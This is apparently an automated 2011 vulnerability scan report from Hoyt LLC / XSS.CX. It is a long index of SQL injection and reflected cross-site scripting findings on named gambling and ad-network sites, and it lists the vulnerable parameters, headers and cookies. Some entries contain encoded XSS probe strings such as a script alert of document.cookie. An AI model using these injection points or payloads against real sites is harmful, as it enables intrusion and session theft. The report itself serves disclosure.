XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05162011-01

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Mon May 16 08:24:05 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search


Loading

1. SQL injection

1.1. https://scratch.betsson.com/en/Casino/Disco-Keno [name of an arbitrarily supplied request parameter]

1.2. https://scratch.betsson.com/en/Fantasy/The-Lost-Maya [User-Agent HTTP header]

1.3. https://scratch.betsson.com/en/Slots/Fantasia [site cookie]

1.4. https://scratch.betsson.com/en/Sports/Bowling [User-Agent HTTP header]

1.5. https://scratch.betsson.com/en/Sports/World-Champions [Referer HTTP header]

1.6. http://scratch.co.uk/images/games_ENG.swf [REST URL parameter 1]

1.7. http://scratch.co.uk/images/games_ENG.swf [REST URL parameter 2]

1.8. http://scratch.co.uk/resources/style.css [REST URL parameter 1]

1.9. http://scratch.co.uk/resources/style.css [REST URL parameter 2]

1.10. http://trk.primescratchcards.com/ [ac parameter]

1.11. http://www.interwetten.org/ [Referer HTTP header]

1.12. http://www.neogames.com/our-partners [name of an arbitrarily supplied request parameter]

1.13. http://www.neogames.com/outbound/article/www.bet365.com [name of an arbitrarily supplied request parameter]

2. LDAP injection

3. Cross-site scripting (reflected)

3.1. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [adurl parameter]

3.2. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [adurl parameter]

3.3. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [ai parameter]

3.4. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [ai parameter]

3.5. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [client parameter]

3.6. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [client parameter]

3.7. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [num parameter]

3.8. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [num parameter]

3.9. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sig parameter]

3.10. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sig parameter]

3.11. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sz parameter]

3.12. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sz parameter]

3.13. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [adurl parameter]

3.14. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [adurl parameter]

3.15. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [ai parameter]

3.16. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [ai parameter]

3.17. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [client parameter]

3.18. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [client parameter]

3.19. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [num parameter]

3.20. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [num parameter]

3.21. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sig parameter]

3.22. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sig parameter]

3.23. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sz parameter]

3.24. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sz parameter]

3.25. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

3.26. http://bid.openx.net/json [c parameter]

3.27. http://rtb50.doubleverify.com/rtb.ashx/verifyc [callback parameter]

3.28. http://scratch.co.uk/ [currency parameter]

3.29. http://scratch.co.uk/ [currency parameter]

3.30. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx [CUR parameter]

3.31. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx [PRD parameter]

3.32. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx [UNIQUEVISITORID parameter]

3.33. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [AR parameter]

3.34. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [BD parameter]

3.35. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [BD parameter]

3.36. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [BO parameter]

3.37. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [PAR parameter]

3.38. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [RegistrationMode parameter]

3.39. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [SDN parameter]

3.40. http://trk.primescratchcards.com/ [ac parameter]

3.41. https://www.aspireaffiliates.com/ [CMI parameter]

3.42. https://www.aspireaffiliates.com/ [CMI parameter]

3.43. https://www.aspireaffiliates.com/ [CMI parameter]

3.44. https://www.aspireaffiliates.com/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.45. https://www.aspireaffiliates.com/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.46. https://www.aspireaffiliates.com/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.47. https://www.aspireaffiliates.com/ [name of an arbitrarily supplied request parameter]

3.48. https://www.aspireaffiliates.com/ [name of an arbitrarily supplied request parameter]

3.49. https://www.aspireaffiliates.com/ [name of an arbitrarily supplied request parameter]

3.50. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [CMI parameter]

3.51. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.52. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.53. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.54. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [name of an arbitrarily supplied request parameter]

3.55. https://www.aspireaffiliates.com/marketing-samples/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.56. https://www.aspireaffiliates.com/marketing-samples/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.57. https://www.aspireaffiliates.com/marketing-samples/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.58. https://www.aspireaffiliates.com/marketing-samples/ [name of an arbitrarily supplied request parameter]

3.59. https://www.aspireaffiliates.com/marketing-samples/ [name of an arbitrarily supplied request parameter]

3.60. https://www.aspireaffiliates.com/marketing-samples/ [name of an arbitrarily supplied request parameter]

3.61. https://www.aspireaffiliates.com/mobile/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.62. https://www.aspireaffiliates.com/mobile/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.63. https://www.aspireaffiliates.com/mobile/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

3.64. https://www.aspireaffiliates.com/mobile/ [name of an arbitrarily supplied request parameter]

3.65. https://www.aspireaffiliates.com/mobile/ [name of an arbitrarily supplied request parameter]

3.66. https://www.aspireaffiliates.com/mobile/ [name of an arbitrarily supplied request parameter]

3.67. http://www.bet365.com/home/ [name of an arbitrarily supplied request parameter]

3.68. http://www.bet365.com/home/default.asp [name of an arbitrarily supplied request parameter]

3.69. http://www.metacafe.com/fplayer/ [name of an arbitrarily supplied request parameter]

3.70. http://www.okscratchcards.com/ [70343%27-alert(1)-%2789d3bb43680 parameter]

3.71. http://www.okscratchcards.com/ [name of an arbitrarily supplied request parameter]

3.72. http://www.okscratchcards.com/terms-and-conditions.aspx [& parameter]

3.73. http://www.okscratchcards.com/terms-and-conditions.aspx [name of an arbitrarily supplied request parameter]

3.74. http://www.primescratchcards.com/index.asp [curr parameter]

3.75. http://www.primescratchcards.com/index.asp [curr parameter]

3.76. http://ad.yieldmanager.com/imp [Referer HTTP header]

3.77. https://www.interwetten.com/sportsbook/registrationform.aspx [User-Agent HTTP header]

3.78. http://home.okscratchcards.com/AboutUs.aspx [BO cookie]

3.79. http://home.okscratchcards.com/AboutUs.aspx [RegistrationMode cookie]

3.80. http://home.okscratchcards.com/ContactUsMail.aspx [BO cookie]

3.81. http://home.okscratchcards.com/ContactUsMail.aspx [RegistrationMode cookie]

3.82. http://home.okscratchcards.com/FairPlay.aspx [BO cookie]

3.83. http://home.okscratchcards.com/FairPlay.aspx [RegistrationMode cookie]

3.84. http://home.okscratchcards.com/PlayersClub.aspx [BO cookie]

3.85. http://home.okscratchcards.com/PlayersClub.aspx [RegistrationMode cookie]

3.86. http://home.okscratchcards.com/Promotions.aspx [BO cookie]

3.87. http://home.okscratchcards.com/Promotions.aspx [RegistrationMode cookie]

3.88. http://home.okscratchcards.com/Responsible.aspx [BO cookie]

3.89. http://home.okscratchcards.com/Responsible.aspx [RegistrationMode cookie]

3.90. http://home.okscratchcards.com/SecurityAndPrivacy.aspx [BO cookie]

3.91. http://home.okscratchcards.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]

3.92. http://home.okscratchcards.com/Terms.aspx [BO cookie]

3.93. http://home.okscratchcards.com/Terms.aspx [RegistrationMode cookie]

3.94. http://home.okscratchcards.com/help.aspx [BO cookie]

3.95. http://home.okscratchcards.com/help.aspx [RegistrationMode cookie]

3.96. http://okscratchcards.com/ [name of an arbitrarily supplied request parameter]

3.97. http://primescratchcards.com/images/HelpDepositMethods.asp [ARC cookie]

3.98. http://primescratchcards.com/images/HelpDepositMethods.asp [ARC cookie]

3.99. http://primescratchcards.com/images/HelpDepositMethods.asp [ARC cookie]

3.100. http://primescratchcards.com/images/InviteFriend.asp [ARC cookie]

3.101. http://primescratchcards.com/images/InviteFriend.asp [ARC cookie]

3.102. http://primescratchcards.com/images/InviteFriend.asp [ARC cookie]

3.103. http://primescratchcards.com/images/Responsible.asp [ARC cookie]

3.104. http://primescratchcards.com/images/Responsible.asp [ARC cookie]

3.105. http://primescratchcards.com/images/Responsible.asp [ARC cookie]

3.106. http://primescratchcards.com/images/SecurityAndPrivacy.asp [ARC cookie]

3.107. http://primescratchcards.com/images/SecurityAndPrivacy.asp [ARC cookie]

3.108. http://primescratchcards.com/images/SecurityAndPrivacy.asp [ARC cookie]

3.109. http://primescratchcards.com/images/aboutus.asp [ARC cookie]

3.110. http://primescratchcards.com/images/aboutus.asp [ARC cookie]

3.111. http://primescratchcards.com/images/aboutus.asp [ARC cookie]

3.112. http://primescratchcards.com/images/affiliates.asp [ARC cookie]

3.113. http://primescratchcards.com/images/affiliates.asp [ARC cookie]

3.114. http://primescratchcards.com/images/affiliates.asp [ARC cookie]

3.115. http://primescratchcards.com/images/bg.jpg [ARC cookie]

3.116. http://primescratchcards.com/images/bg.jpg [ARC cookie]

3.117. http://primescratchcards.com/images/bg.jpg [ARC cookie]

3.118. http://primescratchcards.com/images/contactus.asp [ARC cookie]

3.119. http://primescratchcards.com/images/contactus.asp [ARC cookie]

3.120. http://primescratchcards.com/images/contactus.asp [ARC cookie]

3.121. http://primescratchcards.com/images/fairplay.asp [ARC cookie]

3.122. http://primescratchcards.com/images/fairplay.asp [ARC cookie]

3.123. http://primescratchcards.com/images/fairplay.asp [ARC cookie]

3.124. http://primescratchcards.com/images/help.asp [ARC cookie]

3.125. http://primescratchcards.com/images/help.asp [ARC cookie]

3.126. http://primescratchcards.com/images/help.asp [ARC cookie]

3.127. http://primescratchcards.com/images/index.asp [ARC cookie]

3.128. http://primescratchcards.com/images/index.asp [ARC cookie]

3.129. http://primescratchcards.com/images/index.asp [ARC cookie]

3.130. http://primescratchcards.com/images/media.asp [ARC cookie]

3.131. http://primescratchcards.com/images/media.asp [ARC cookie]

3.132. http://primescratchcards.com/images/media.asp [ARC cookie]

3.133. http://primescratchcards.com/images/playersclub.asp [ARC cookie]

3.134. http://primescratchcards.com/images/playersclub.asp [ARC cookie]

3.135. http://primescratchcards.com/images/playersclub.asp [ARC cookie]

3.136. http://primescratchcards.com/images/promotions.asp [ARC cookie]

3.137. http://primescratchcards.com/images/promotions.asp [ARC cookie]

3.138. http://primescratchcards.com/images/promotions.asp [ARC cookie]

3.139. http://primescratchcards.com/images/terms.asp [ARC cookie]

3.140. http://primescratchcards.com/images/terms.asp [ARC cookie]

3.141. http://primescratchcards.com/images/terms.asp [ARC cookie]

3.142. http://primescratchcards.com/images/underage.asp [ARC cookie]

3.143. http://primescratchcards.com/images/underage.asp [ARC cookie]

3.144. http://primescratchcards.com/images/underage.asp [ARC cookie]

3.145. http://scratch.co.uk/ [affiliate cookie]

3.146. http://scratch.co.uk/ [affiliate cookie]

3.147. http://scratch.co.uk/ [currency cookie]

3.148. http://scratch.co.uk/ [currency cookie]

3.149. http://scratch.co.uk/ [currency cookie]

3.150. http://scratch.co.uk/ [currency cookie]

3.151. http://scratch.co.uk/ [lang cookie]

3.152. http://scratch.co.uk/ [lang cookie]

3.153. http://scratch.co.uk/ [neogamesemail cookie]

3.154. http://scratch.co.uk/about/ [affiliate cookie]

3.155. http://scratch.co.uk/about/ [currency cookie]

3.156. http://scratch.co.uk/about/ [lang cookie]

3.157. http://scratch.co.uk/contact/ [affiliate cookie]

3.158. http://scratch.co.uk/contact/ [currency cookie]

3.159. http://scratch.co.uk/contact/ [lang cookie]

3.160. http://scratch.co.uk/help/ [affiliate cookie]

3.161. http://scratch.co.uk/help/ [currency cookie]

3.162. http://scratch.co.uk/help/ [lang cookie]

3.163. http://scratch.co.uk/help/deposit/methods/ [affiliate cookie]

3.164. http://scratch.co.uk/help/deposit/methods/ [currency cookie]

3.165. http://scratch.co.uk/help/deposit/methods/ [lang cookie]

3.166. http://scratch.co.uk/help/fairplay/ [affiliate cookie]

3.167. http://scratch.co.uk/help/fairplay/ [currency cookie]

3.168. http://scratch.co.uk/help/fairplay/ [lang cookie]

3.169. http://scratch.co.uk/help/privacy/ [affiliate cookie]

3.170. http://scratch.co.uk/help/privacy/ [currency cookie]

3.171. http://scratch.co.uk/help/privacy/ [lang cookie]

3.172. http://scratch.co.uk/invite-friend/ [affiliate cookie]

3.173. http://scratch.co.uk/invite-friend/ [currency cookie]

3.174. http://scratch.co.uk/invite-friend/ [lang cookie]

3.175. http://scratch.co.uk/over-18/ [affiliate cookie]

3.176. http://scratch.co.uk/over-18/ [currency cookie]

3.177. http://scratch.co.uk/over-18/ [lang cookie]

3.178. http://scratch.co.uk/problem-gambling/ [affiliate cookie]

3.179. http://scratch.co.uk/problem-gambling/ [currency cookie]

3.180. http://scratch.co.uk/problem-gambling/ [lang cookie]

3.181. http://scratch.co.uk/promotions/ [affiliate cookie]

3.182. http://scratch.co.uk/promotions/ [currency cookie]

3.183. http://scratch.co.uk/promotions/ [lang cookie]

3.184. http://scratch.co.uk/promotions/argos/ [affiliate cookie]

3.185. http://scratch.co.uk/promotions/argos/ [currency cookie]

3.186. http://scratch.co.uk/promotions/argos/ [currency cookie]

3.187. http://scratch.co.uk/promotions/argos/ [lang cookie]

3.188. http://scratch.co.uk/terms/ [affiliate cookie]

3.189. http://scratch.co.uk/terms/ [currency cookie]

3.190. http://scratch.co.uk/terms/ [lang cookie]

3.191. http://scratch.co.uk/vis-club/ [affiliate cookie]

3.192. http://scratch.co.uk/vis-club/ [currency cookie]

3.193. http://scratch.co.uk/vis-club/ [lang cookie]

3.194. http://scratch.co.uk/winners/ [affiliate cookie]

3.195. http://scratch.co.uk/winners/ [currency cookie]

3.196. http://scratch.co.uk/winners/ [lang cookie]

3.197. http://www.bigmoneyscratch.com/AboutUs.aspx [BO cookie]

3.198. http://www.bigmoneyscratch.com/AboutUs.aspx [RegistrationMode cookie]

3.199. http://www.bigmoneyscratch.com/Affiliates.aspx [BO cookie]

3.200. http://www.bigmoneyscratch.com/Affiliates.aspx [RegistrationMode cookie]

3.201. http://www.bigmoneyscratch.com/ContactUsChat.aspx [BO cookie]

3.202. http://www.bigmoneyscratch.com/ContactUsChat.aspx [RegistrationMode cookie]

3.203. http://www.bigmoneyscratch.com/ContactUsFax.aspx [BO cookie]

3.204. http://www.bigmoneyscratch.com/ContactUsFax.aspx [RegistrationMode cookie]

3.205. http://www.bigmoneyscratch.com/ContactUsMail.aspx [BO cookie]

3.206. http://www.bigmoneyscratch.com/ContactUsMail.aspx [RegistrationMode cookie]

3.207. http://www.bigmoneyscratch.com/ContactUsTel.aspx [BO cookie]

3.208. http://www.bigmoneyscratch.com/ContactUsTel.aspx [RegistrationMode cookie]

3.209. http://www.bigmoneyscratch.com/FAQ.aspx [BO cookie]

3.210. http://www.bigmoneyscratch.com/FAQ.aspx [RegistrationMode cookie]

3.211. http://www.bigmoneyscratch.com/FairPlay.aspx [BO cookie]

3.212. http://www.bigmoneyscratch.com/FairPlay.aspx [RegistrationMode cookie]

3.213. http://www.bigmoneyscratch.com/Help.aspx [BO cookie]

3.214. http://www.bigmoneyscratch.com/Help.aspx [RegistrationMode cookie]

3.215. http://www.bigmoneyscratch.com/Home.aspx [BO cookie]

3.216. http://www.bigmoneyscratch.com/Home.aspx [RegistrationMode cookie]

3.217. http://www.bigmoneyscratch.com/InviteFriend.aspx [BO cookie]

3.218. http://www.bigmoneyscratch.com/InviteFriend.aspx [RegistrationMode cookie]

3.219. http://www.bigmoneyscratch.com/Mobile.aspx [BO cookie]

3.220. http://www.bigmoneyscratch.com/Mobile.aspx [RegistrationMode cookie]

3.221. http://www.bigmoneyscratch.com/PlayersClub.aspx [BO cookie]

3.222. http://www.bigmoneyscratch.com/PlayersClub.aspx [RegistrationMode cookie]

3.223. http://www.bigmoneyscratch.com/Promotions.aspx [BO cookie]

3.224. http://www.bigmoneyscratch.com/Promotions.aspx [RegistrationMode cookie]

3.225. http://www.bigmoneyscratch.com/Responsible.aspx [BO cookie]

3.226. http://www.bigmoneyscratch.com/Responsible.aspx [RegistrationMode cookie]

3.227. http://www.bigmoneyscratch.com/SecurityAndPrivacy.aspx [BO cookie]

3.228. http://www.bigmoneyscratch.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]

3.229. http://www.bigmoneyscratch.com/Terms.aspx [BO cookie]

3.230. http://www.bigmoneyscratch.com/Terms.aspx [RegistrationMode cookie]

3.231. http://www.bigmoneyscratch.com/UnderAge.aspx [BO cookie]

3.232. http://www.bigmoneyscratch.com/UnderAge.aspx [RegistrationMode cookie]

3.233. http://www.hopa.com/ [BO cookie]

3.234. http://www.hopa.com/ [RegistrationMode cookie]

3.235. http://www.info.crazyscratch.com/AboutUs.aspx [BO cookie]

3.236. http://www.info.crazyscratch.com/AboutUs.aspx [RegistrationMode cookie]

3.237. http://www.info.crazyscratch.com/ContactUsFax.aspx [BO cookie]

3.238. http://www.info.crazyscratch.com/ContactUsFax.aspx [RegistrationMode cookie]

3.239. http://www.info.crazyscratch.com/ContactUsMail.aspx [BO cookie]

3.240. http://www.info.crazyscratch.com/ContactUsMail.aspx [RegistrationMode cookie]

3.241. http://www.info.crazyscratch.com/ContactUsTel.aspx [BO cookie]

3.242. http://www.info.crazyscratch.com/ContactUsTel.aspx [RegistrationMode cookie]

3.243. http://www.info.crazyscratch.com/FairPlay.aspx [BO cookie]

3.244. http://www.info.crazyscratch.com/FairPlay.aspx [RegistrationMode cookie]

3.245. http://www.info.crazyscratch.com/Help.aspx [BO cookie]

3.246. http://www.info.crazyscratch.com/Help.aspx [RegistrationMode cookie]

3.247. http://www.info.crazyscratch.com/InviteFriend.aspx [BO cookie]

3.248. http://www.info.crazyscratch.com/InviteFriend.aspx [RegistrationMode cookie]

3.249. http://www.info.crazyscratch.com/PlayersClub.aspx [BO cookie]

3.250. http://www.info.crazyscratch.com/PlayersClub.aspx [RegistrationMode cookie]

3.251. http://www.info.crazyscratch.com/Privacy.aspx [BO cookie]

3.252. http://www.info.crazyscratch.com/Privacy.aspx [RegistrationMode cookie]

3.253. http://www.info.crazyscratch.com/Promotions.aspx [BO cookie]

3.254. http://www.info.crazyscratch.com/Promotions.aspx [RegistrationMode cookie]

3.255. http://www.info.crazyscratch.com/Responsible.aspx [BO cookie]

3.256. http://www.info.crazyscratch.com/Responsible.aspx [RegistrationMode cookie]

3.257. http://www.info.crazyscratch.com/Terms.aspx [BO cookie]

3.258. http://www.info.crazyscratch.com/Terms.aspx [RegistrationMode cookie]

3.259. http://www.info.crazyscratch.com/UnderAge.aspx [BO cookie]

3.260. http://www.info.crazyscratch.com/UnderAge.aspx [RegistrationMode cookie]

3.261. http://www.karamba.com/ [BO cookie]

3.262. http://www.karamba.com/ [RegistrationMode cookie]

3.263. http://www.karamba.com/AboutUs.aspx [BO cookie]

3.264. http://www.karamba.com/AboutUs.aspx [RegistrationMode cookie]

3.265. http://www.karamba.com/FairPlay.aspx [BO cookie]

3.266. http://www.karamba.com/FairPlay.aspx [RegistrationMode cookie]

3.267. http://www.karamba.com/Help.aspx [BO cookie]

3.268. http://www.karamba.com/Help.aspx [RegistrationMode cookie]

3.269. http://www.karamba.com/Home.aspx [BO cookie]

3.270. http://www.karamba.com/Home.aspx [RegistrationMode cookie]

3.271. http://www.karamba.com/InviteFriend.aspx [BO cookie]

3.272. http://www.karamba.com/InviteFriend.aspx [RegistrationMode cookie]

3.273. http://www.karamba.com/PlayersClub.aspx [BO cookie]

3.274. http://www.karamba.com/PlayersClub.aspx [RegistrationMode cookie]

3.275. http://www.karamba.com/Privacy.aspx [BO cookie]

3.276. http://www.karamba.com/Privacy.aspx [RegistrationMode cookie]

3.277. http://www.karamba.com/Promotions.aspx [BO cookie]

3.278. http://www.karamba.com/Promotions.aspx [RegistrationMode cookie]

3.279. http://www.karamba.com/Responsible.aspx [BO cookie]

3.280. http://www.karamba.com/Responsible.aspx [RegistrationMode cookie]

3.281. http://www.karamba.com/Sitemap.aspx [BO cookie]

3.282. http://www.karamba.com/Sitemap.aspx [RegistrationMode cookie]

3.283. http://www.karamba.com/Terms.aspx [BO cookie]

3.284. http://www.karamba.com/Terms.aspx [RegistrationMode cookie]

3.285. http://www.karamba.com/UnderAge.aspx [BO cookie]

3.286. http://www.karamba.com/UnderAge.aspx [RegistrationMode cookie]

3.287. http://www.karamba.com/click/Karamba.com/ENG/Home/ [BO cookie]

3.288. http://www.karamba.com/click/Karamba.com/ENG/Home/ [RegistrationMode cookie]

3.289. http://www.mundirasca.com/ [BO cookie]

3.290. http://www.mundirasca.com/ [RegistrationMode cookie]

3.291. http://www.mundirasca.com/AboutUs.aspx [BO cookie]

3.292. http://www.mundirasca.com/AboutUs.aspx [RegistrationMode cookie]

3.293. http://www.mundirasca.com/ContactUsChat.aspx [BO cookie]

3.294. http://www.mundirasca.com/ContactUsChat.aspx [RegistrationMode cookie]

3.295. http://www.mundirasca.com/ContactUsFax.aspx [BO cookie]

3.296. http://www.mundirasca.com/ContactUsFax.aspx [RegistrationMode cookie]

3.297. http://www.mundirasca.com/ContactUsMail.aspx [BO cookie]

3.298. http://www.mundirasca.com/ContactUsMail.aspx [RegistrationMode cookie]

3.299. http://www.mundirasca.com/ContactUsTel.aspx [BO cookie]

3.300. http://www.mundirasca.com/ContactUsTel.aspx [RegistrationMode cookie]

3.301. http://www.mundirasca.com/FAQ.aspx [BO cookie]

3.302. http://www.mundirasca.com/FAQ.aspx [RegistrationMode cookie]

3.303. http://www.mundirasca.com/FairPlay.aspx [BO cookie]

3.304. http://www.mundirasca.com/FairPlay.aspx [RegistrationMode cookie]

3.305. http://www.mundirasca.com/Help.aspx [BO cookie]

3.306. http://www.mundirasca.com/Help.aspx [RegistrationMode cookie]

3.307. http://www.mundirasca.com/InviteFriend.aspx [BO cookie]

3.308. http://www.mundirasca.com/InviteFriend.aspx [RegistrationMode cookie]

3.309. http://www.mundirasca.com/PlayersClub.aspx [BO cookie]

3.310. http://www.mundirasca.com/PlayersClub.aspx [RegistrationMode cookie]

3.311. http://www.mundirasca.com/Promotions.aspx [BO cookie]

3.312. http://www.mundirasca.com/Promotions.aspx [RegistrationMode cookie]

3.313. http://www.mundirasca.com/Responsible.aspx [BO cookie]

3.314. http://www.mundirasca.com/Responsible.aspx [RegistrationMode cookie]

3.315. http://www.mundirasca.com/SecurityAndPrivacy.aspx [BO cookie]

3.316. http://www.mundirasca.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]

3.317. http://www.mundirasca.com/Terms.aspx [BO cookie]

3.318. http://www.mundirasca.com/Terms.aspx [RegistrationMode cookie]

3.319. http://www.mundirasca.com/UnderAge.aspx [BO cookie]

3.320. http://www.mundirasca.com/UnderAge.aspx [RegistrationMode cookie]

3.321. http://www.mundirasca.com/click/MundiRasca.com/SPA/Home/ [BO cookie]

3.322. http://www.mundirasca.com/click/MundiRasca.com/SPA/Home/ [RegistrationMode cookie]

3.323. https://www.neogamespartners.com/ [CMI parameter]

3.324. https://www.neogamespartners.com/ [CMI parameter]

3.325. https://www.neogamespartners.com/ [CMI parameter]

3.326. https://www.neogamespartners.com/ [name of an arbitrarily supplied request parameter]

3.327. https://www.neogamespartners.com/ [name of an arbitrarily supplied request parameter]

3.328. https://www.neogamespartners.com/ [name of an arbitrarily supplied request parameter]

3.329. http://www.primescratchcards.com/HelpDepositMethods.asp [ARC cookie]

3.330. http://www.primescratchcards.com/HelpDepositMethods.asp [ARC cookie]

3.331. http://www.primescratchcards.com/HelpDepositMethods.asp [ARC cookie]

3.332. http://www.primescratchcards.com/InviteFriend.asp [ARC cookie]

3.333. http://www.primescratchcards.com/InviteFriend.asp [ARC cookie]

3.334. http://www.primescratchcards.com/InviteFriend.asp [ARC cookie]

3.335. http://www.primescratchcards.com/Responsible.asp [ARC cookie]

3.336. http://www.primescratchcards.com/Responsible.asp [ARC cookie]

3.337. http://www.primescratchcards.com/Responsible.asp [ARC cookie]

3.338. http://www.primescratchcards.com/SecurityAndPrivacy.asp [ARC cookie]

3.339. http://www.primescratchcards.com/SecurityAndPrivacy.asp [ARC cookie]

3.340. http://www.primescratchcards.com/SecurityAndPrivacy.asp [ARC cookie]

3.341. http://www.primescratchcards.com/aboutus.asp [ARC cookie]

3.342. http://www.primescratchcards.com/aboutus.asp [ARC cookie]

3.343. http://www.primescratchcards.com/aboutus.asp [ARC cookie]

3.344. http://www.primescratchcards.com/affiliates.asp [ARC cookie]

3.345. http://www.primescratchcards.com/affiliates.asp [ARC cookie]

3.346. http://www.primescratchcards.com/affiliates.asp [ARC cookie]

3.347. http://www.primescratchcards.com/contactus.asp [ARC cookie]

3.348. http://www.primescratchcards.com/contactus.asp [ARC cookie]

3.349. http://www.primescratchcards.com/contactus.asp [ARC cookie]

3.350. http://www.primescratchcards.com/fairplay.asp [ARC cookie]

3.351. http://www.primescratchcards.com/fairplay.asp [ARC cookie]

3.352. http://www.primescratchcards.com/fairplay.asp [ARC cookie]

3.353. http://www.primescratchcards.com/help.asp [ARC cookie]

3.354. http://www.primescratchcards.com/help.asp [ARC cookie]

3.355. http://www.primescratchcards.com/help.asp [ARC cookie]

3.356. http://www.primescratchcards.com/index.asp [ARC cookie]

3.357. http://www.primescratchcards.com/index.asp [ARC cookie]

3.358. http://www.primescratchcards.com/index.asp [ARC cookie]

3.359. http://www.primescratchcards.com/media.asp [ARC cookie]

3.360. http://www.primescratchcards.com/media.asp [ARC cookie]

3.361. http://www.primescratchcards.com/media.asp [ARC cookie]

3.362. http://www.primescratchcards.com/playersclub.asp [ARC cookie]

3.363. http://www.primescratchcards.com/playersclub.asp [ARC cookie]

3.364. http://www.primescratchcards.com/playersclub.asp [ARC cookie]

3.365. http://www.primescratchcards.com/promotions.asp [ARC cookie]

3.366. http://www.primescratchcards.com/promotions.asp [ARC cookie]

3.367. http://www.primescratchcards.com/promotions.asp [ARC cookie]

3.368. http://www.primescratchcards.com/terms.asp [ARC cookie]

3.369. http://www.primescratchcards.com/terms.asp [ARC cookie]

3.370. http://www.primescratchcards.com/terms.asp [ARC cookie]

3.371. http://www.primescratchcards.com/underage.asp [ARC cookie]

3.372. http://www.primescratchcards.com/underage.asp [ARC cookie]

3.373. http://www.primescratchcards.com/underage.asp [ARC cookie]

3.374. http://www.scratch2cash.com/ [BO cookie]

3.375. http://www.scratch2cash.com/ [RegistrationMode cookie]

3.376. http://www.scratch2cash.com/AboutUs.aspx [BO cookie]

3.377. http://www.scratch2cash.com/AboutUs.aspx [RegistrationMode cookie]

3.378. http://www.scratch2cash.com/ContactUsMail.aspx [BO cookie]

3.379. http://www.scratch2cash.com/ContactUsMail.aspx [RegistrationMode cookie]

3.380. http://www.scratch2cash.com/FairPlay.aspx [BO cookie]

3.381. http://www.scratch2cash.com/FairPlay.aspx [RegistrationMode cookie]

3.382. http://www.scratch2cash.com/Help.aspx [BO cookie]

3.383. http://www.scratch2cash.com/Help.aspx [RegistrationMode cookie]

3.384. http://www.scratch2cash.com/Home.aspx [BO cookie]

3.385. http://www.scratch2cash.com/Home.aspx [RegistrationMode cookie]

3.386. http://www.scratch2cash.com/InviteFriend.aspx [BO cookie]

3.387. http://www.scratch2cash.com/InviteFriend.aspx [RegistrationMode cookie]

3.388. http://www.scratch2cash.com/PlayersClub.aspx [BO cookie]

3.389. http://www.scratch2cash.com/PlayersClub.aspx [RegistrationMode cookie]

